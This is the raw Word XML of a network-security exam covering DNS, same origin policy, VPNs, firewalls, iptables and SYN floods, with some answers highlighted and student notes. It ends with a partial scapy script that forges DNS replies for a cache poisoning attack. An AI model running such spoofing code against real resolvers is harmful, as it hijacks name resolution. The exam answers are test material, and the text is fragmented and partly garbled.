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98D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1 Which of the following is the correct way to conduct reverse lookup for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gramEnd"/>
    </w:p>
    <w:p w14:paraId="4E3A130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address 153.91.153.3 using dig?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA096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dig 153.91.153.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274898C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B. dig -x 153.91.153.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2719DFA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dig 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ptr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153.91.153.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A545C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None of the above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D72F42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2 in a DNS zone which record type is used to store information for a domain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name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2E0C741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server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECEC25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A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F2" w:hAnsi="CIDFont+F2" w:cs="CIDFont+F2"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>-ipv4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D01721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В. АAAА</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F2" w:hAnsi="CIDFont+F2" w:cs="CIDFont+F2"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>-ipv6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B82E64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C. NS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C9DAC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PTR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC11F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3. Which of the following domain will not be included in the root zone?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A8FCD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A..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com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF8264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.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E18D1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.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEFA67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D. ucmo.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D30D8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4. Which file on the Ubuntu Linux machine will be checked first before the DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBA170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resolver contacts the local DNS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server?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2D13645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A. /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062419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/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFCC84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etc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/services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9B220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etc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/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597469A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etc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/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620573E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5. According to the following zone file, if we conduct a DNS lookup for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063CF92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mail.example.com, what IP address will you get?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C30286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1.2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8A2D2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B.1.2.3.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F37DF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10.9.0.153</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4933970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3547FB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D. 1.2.3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B352FB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6. Use the same zone file above, if the DNS record is cached in the local DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227499A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server, how long will it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be</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E38A15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8 hours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D93885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4 weeks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE2286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1day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5233E29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072090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D. 3days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B895EB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7. Which of the following reason(s) make the remote DNS cache poisoning attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5002E5A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much difficult compared with the local DNS cache poisoning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attack?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1A31DFD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The attacker does not know the DNS transaction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id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0665D5B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the attacker does not know the source port number in the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DNSquery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0BC56CD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FD5D30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lastRenderedPageBreak/>
        <w:t>C. the cache effect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FECF18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all the above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFBCE0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8. Assume the attacker a launching a DNS cache poisoning attacker against the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1C66B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victim and the victim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conducts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 DNS lookup on www.attacker32.com. Review the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C875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following picture and identify the entry impossible to be included in the valid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DNS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3600014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response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393E966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www.attacker32.com entry under the QUESTIONSECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311CC66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www.attacker32.com entry under the ANSWERSECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F5621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attacker32.com entry under the AUTHORITYSECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC02CE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FE2742">
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>D. facebook.com entry under the AUTHORITY SECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76873DA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9. If we want to set up reverse lockup zone for the 153.91.3.0/24 subnet, which</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D55488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zone file name below should we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use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0BCC052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153.91.153.0 91.in-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addr.arpa</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2CEDDBF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B.153.91.3.in-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addr.arpa</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3C1D75A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0.153.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91.153.in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-addr.arpa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5137E52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8E1990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D. 3.91.153. in-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E1990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addr.arpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="685F06A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10. Which of the following statement concerning same origin policy is incorrect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208FD7D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The same origin policy (SOP) is a critical security mechanism that restricts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how</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4958276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 document or script loaded from one origin can interact with a resource from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EC5B2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another origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6771E4F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Same origin policy applies only to scripts. It prevents scripts on one origin from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1769FD5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accessing data from another origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58281CF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SOP generally allows a domain to issue requests to other domains, but not to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EBF1F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access the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responses</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17AE807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BB7416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D. Sop is not enforced by the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB7416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browser</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C828EF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11. Which of the following statement concerning IP tunnelling is incorrect?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B2CB9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IPSectunnelling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works at kernel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level</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0138DBA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TLS/SSL tunneling works outside the kernel, at the application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level</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D4FB5A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the idea behind IP tunneling is to embed the original IP packet inside a new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gramEnd"/>
    </w:p>
    <w:p w14:paraId="75F826D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packet before sending it to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internet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4BF74925" w14:textId="77777777" w:rsidR="00624194" w:rsidRPr="000D121D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</w:pPr>
      <w:r w:rsidRPr="000D121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D. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D121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IPSectunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D121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 is the preferred VPN technology nowadays due to its </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D121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flexibility</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="68BDE31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0D121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by adopting the IPsec protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BDAA3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12. Which of the following statement concerning TUN and TAP interface is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2238F1E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incorrect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4FB8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Both TUN and TAP Interfaces are virtual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interfaces</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3D52C80E" w14:textId="77777777" w:rsidR="00624194" w:rsidRPr="00A31C1C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</w:pPr>
      <w:r w:rsidRPr="00A31C1C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B. The TUN interface works at the transport layer as it is mainly used for the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD1A2B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A31C1C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TLS/SSL, tunneling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245C3A5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The TAP interface works at the link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layer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01362E9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The TUN interface uses routing to connect the private network to the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entry</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="16A5FF5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lastRenderedPageBreak/>
        <w:t>point of VPN tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7940A38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13. Which of the statement concerning the firewall is incorrect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCFA830" w14:textId="77777777" w:rsidR="00624194" w:rsidRPr="00C1005A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</w:pPr>
      <w:r w:rsidRPr="00C1005A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A. The packet filter firewall only checks individual packets headers to make the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7405A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C1005A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firewall rule decision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A09340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the stateful firewall tracks the state of traffic by monitoring all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connections</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3E1CD28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interactions until they are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closed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="72C50F1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The proxy firewall analyses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upto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the application layer to determine if the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packet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CE07F8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should be allowed or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rejected</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B8860D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In addition to maintain a state table, the stateful firewall also checks up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upto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the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F7DDF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application layer to determine if the packet should be allowed or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rejected</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="150A251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14. which chain is not included in the NAT table of the iptables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413EBD1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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F2" w:hAnsi="CIDFont+F2" w:cs="CIDFont+F2"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>/p, o/p, post, pre</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE85F3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PREROUTING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539893B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 w:rsidRPr="00C86754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B. INPUT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C86754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>aki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F68E20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OUTPUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B3DFA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FORWARD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309759C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15. Which of the following iptables statement is correct to block incoming TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395C719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traffic to ports 22, 23 and 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7EE4E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iptables -A INPUT -p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--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22, 23, 80 -j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6120687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iptables -A INPUT -p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--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22:23, 80 -j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3354119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3A4478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C. iptables -A INPUT -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A4478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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A4478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 -m multiport -- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A4478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dports</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A4478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 22, 23, 80 -j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B34AE5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None of the above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F10440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16. Which of the following is the correct sequence for TCP three-way</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0F6C6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handshaking?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BEA8E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SYN, ACK, ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D63491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CE45CA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B. SYN, SYNACK, ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F7CBA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SYN, SYNACK, RST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114C867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SYN, SYNACK, FIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCFFB1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17. Jason was monitoring a server using netstat and below is the part of the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E09C7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to be obtained. Which of the following statement is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true</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4BDF456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Table pic (Answer not found in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chatGPT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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F76D89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5F30F3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A. The server is under TCP SYN flood </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F30F3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attack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D5FCD9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The server is under TCP RESET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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F5F885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The server is under -----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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0EFEC4C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The server is under Fraggle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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5ECEF4D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18. Which of the following statement about TCP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SYNflood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attack is false?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4494601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SYN cookie is a countermeasure to defeat TCP SYN flood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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0B37D0E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In TCP SYN flood attack, the attacker spoofs senders IP addresses to avoid the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77556F9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detection by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thefirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23A655D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lastRenderedPageBreak/>
        <w:t xml:space="preserve">C. To turn on the SYN Cookie countermeasure, we can use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sudo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syncll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-w net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ipv4</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3F36C65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tcp_syncookies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=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33638671" w14:textId="77777777" w:rsidR="00624194" w:rsidRPr="003C78F1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</w:pPr>
      <w:r w:rsidRPr="003C78F1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D. TCP SYN flood attack is a denial of service (DoS) attack which will cause the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29758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 w:rsidRPr="003C78F1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entire server to crash. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C78F1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>Praty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C78F1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 xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C78F1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>aki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D8F1CD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To log into his university's network, Bob needs to use a TLS-based VPN After he</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6651C7D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has established a VPN tunnel between his home machine and his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university's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6A6D0A6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network (128.230.0.0/16), he checks the routing table on his computer which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is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7434F63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listed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below</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2ED5C1C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SEE TABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597761B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19. From the above routing information, what is the IP address of the TUN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ED217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interface on Bob's machine?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2AC17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A.128.230.153.12 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</w:p>
    <w:p w14:paraId="424C617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128.230.155.48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0743383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 w:rsidRPr="004A75FD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 xml:space="preserve">C. 128.230.153.80 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A75FD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>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A75FD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4A75FD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>adrs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A75FD">
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F2" w:hAnsi="CIDFont+F2" w:cs="CIDFont+F2"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> of TUN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D1769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Cannot be determined from the above routing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table</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="56BF776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20. What is the IP address of Bob's university VPN server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A55015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128.230.153.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2031CD" w14:textId="054A49D9" w:rsidR="00624194" w:rsidRDefault="00F410D1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 w:rsidRPr="00F410D1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B</w:t>
      </w:r>
      <w:r w:rsidR="00624194" w:rsidRPr="00F410D1">
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>. 128.230 153.48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40237A3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128.230.153.80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C14437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Cannot be determined from the above routing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table</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="206CB12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21. Compare the following URLs with http://store.company.com/dir/page.html.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D5E4B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Which URL meets the same origin policy?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB4F4E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http://store.company.com/dir2/other.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6523743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563C2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r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="0563C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>https://store.company.com/page.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2E545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</w:p>
    <w:p w14:paraId="3865AEA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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEAD10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Jason is writing a Python script to conduct a local DNS cache poisoning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attack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5E60E90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against the local DNS server (10.0.2.128) His goal is to provide a fake IP 1.2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D7BCC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translation to www.example.net and completely hijack the example.net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domain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5D7304D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with his malicious name server ns.attacker.com. Please help him to complete the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208CF24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following code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A36C57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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="818181"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="818181"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02431B6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D7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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from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scapy.all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import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637E69A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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="FFC76D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spoof_dns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(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A8DAF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6A8859"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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if 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(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 xml:space="preserve">DNS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in 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pkt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and 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 xml:space="preserve">'www.example.com'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in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proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F4" w:hAnsi="CIDFont+F4" w:cs="CIDFont+F4"/>
          <w:color w:val="9976AB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS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qd.qname.decode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(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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="6A8859"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>utf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="6A8859"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE5A47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6A8859"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>8'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)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E2C4B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Swap the source and destination IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A2755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IPpkt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IP(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dst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IP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src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src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IP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dst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107BFC3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Swap the source and destination port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87CEF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UDPpkt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UDP(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dport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UDP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].sport, sport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53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181C367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The Answer Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6277E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Anssec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DNSRR(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rrname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DNS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qd.qname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, type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'A'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159FB33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lastRenderedPageBreak/>
        <w:t>ttl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259200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rdata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'1.1.1.1'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2AABF37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The Authority Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A800F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NSsec1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DNSRR(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rrname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 type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4538AF7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ttl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259200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rdata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'ns1.example.net'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2AB0052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NSsec2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DNSRR(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rrname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 type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3DC2875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ttl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259200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rdata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'ns2.example.net'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6ACF6DE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The Additional Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B7E11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Addsec1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DNSRR(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rrname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'ns1.example.net'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 type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'A'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5343867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ttl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259200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rdata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'1.2.3.4'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608ABC9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Addsec2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DNSRR(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rrname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'ns2.example.net'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 type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'A'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4572485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ttl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259200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rdata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'5.6.7.8'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4C4D4C9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Construct the DNS packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C808F7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DNSpkt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DNS(</w:t>
      </w:r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id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DNS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].id,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qd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pkt[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F4" w:hAnsi="CIDFont+F4" w:cs="CIDFont+F4"/>
          <w:color w:val="9976AB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS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].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qd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, aa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1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rd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qr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1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7B0D2BD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qdcount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1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ancount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1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nscount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,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arcount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4" w:hAnsi="CIDFont+F4" w:cs="CIDFont+F4"/>
          <w:color w:val="6898BC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4358906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>an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Anssec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37A7C40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># Construct the entire IP packet and send it out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A177AB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spoofpkt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IPpkt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/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UDPpkt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/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DNSpkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31CB66D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>send(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spoofpkt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633628D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818181"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="818181"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Sniff UDP query packets and invoke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="818181"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spoof_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="818181"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
